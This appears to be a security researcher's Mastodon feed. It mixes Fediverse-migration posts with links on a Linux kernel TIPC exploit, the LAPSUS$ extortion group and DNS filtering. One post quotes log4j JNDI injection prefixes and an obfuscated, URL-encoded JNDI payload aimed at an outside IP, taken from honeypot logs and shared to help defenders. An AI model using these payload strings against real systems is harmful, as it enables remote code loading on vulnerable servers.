#Twitter buyout puts #Mastodon into spotlight 👇
https://blog.joinmastodon.org/2022/04/twitter-buyout-puts-mastodon-into-spotlight/
Looking for #journalists to follow on masto. Any suggestions?
CVE-2022-0435 is a remote stack overflow in the Transparent Inter-Process Communication (TIPC) module of the Linux kernel. We’re basically able to send a payload of attacker-controlled size to the target, where it will be memcpy’d into a 272-byte buffer on the kernel’s stack—not a bad primitive, right?....
Writing a Linux Kernel Remote in 2022
https://blog.immunityinc.com/p/writing-a-linux-kernel-remote-in-2022/
Really good detailed article.
Lots of new users joining Mastodon today. Welcome!!
Remember to read our rules and code of conduct here:
Those of you cross-posting from #Twitter to #Mastodon - will you please consider doing the opposite? Make the #Fediverse your social media home and Twitter an afterthought.
New article for admins by @dcid showing you how to work with IPTables and DNAT to control the DNS on your network #dnsfiltering #networking #networkadmins #systemadmins #contentfiltering
https://cleanbrowsing.org/2022/04/how-to-control-dns-on-a-network-with-iptables-and-dnat/
Did you know there are centralized alternatives to the #Fediverse?
They are great!
Instead of being developed by volunteers for the community they are developed for millionaires with the sole purpose of getting them more money and influence over the "users".
They contain ads and algorithms, so you don't have to decide, what you want to see, but you get to see what makes you addicted, so you view more ads, buy more stuff and thereby support the capitalist system that we all love.
Instead of anonymity you get to enter your phone number and other form of identification, which totally helps against hate speech, right?
I could go on with advantages, but I think it's best you check them out for yourselves.
A Closer Look at the LAPSUS$ Data Extortion Group.
Microsoft and identity management platform Okta both disclosed this week breaches involving LAPSUS$, a relatively new cybercrime group that specializes in stealing data from big companies and threatening to publish the information unless a ransom demand is paid. Here's a closer look at LAPSUS$, a...
https://krebsonsecurity.com/?p=59041
Wow. CSS Tricks has been acquired by Digital Ocean. Congrats to Chris, he’s a great guy and deserves all the success in the world.
T-Mobile Actively Censoring Certain URLs:
https://www.youtube.com/watch?v=U-HE6_F3tMg
And not just those URLs via SMS. They are also blocking CleanBrowsing DoH url - without ever replying or giving us a valid reason.
${jndi:ldap://
${jndi:rmi://
${jndi:dns://
Another other protocol being actively used that I am missing? At least, only seeing those 3 on our honeypot logs:
https://reputation.noc.org/jndi-attack-logs/
Also some interesting obfuscation, I am assuming to bypass WAF and IDSs:
/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2F
We are sharing jndi (log4j) attack logs here:
https://reputation.noc.org/jndi-attack-logs/
Might be useful to find variation of attacks and IPs abusing it.
Something really cool about this session is you can actually interact by sending in your questions ...
You can send them to:
livestudio@cloudflare.tv or calling (380) 333 - 5273
Had no idea that was a thing.. haha! Oh boy..
If you need some noise to help you fall asleep better..
Will be doing a session with @dcid and @val today at 11 PDT to talk about our work @cleanbrowsing and a bit of our backgrounds...
Founder of CleanBrowsing, Sucuri and OSSEC. Former VP Engineering, GoDaddy - CTO, Sucuri. Builder and breaker by heart...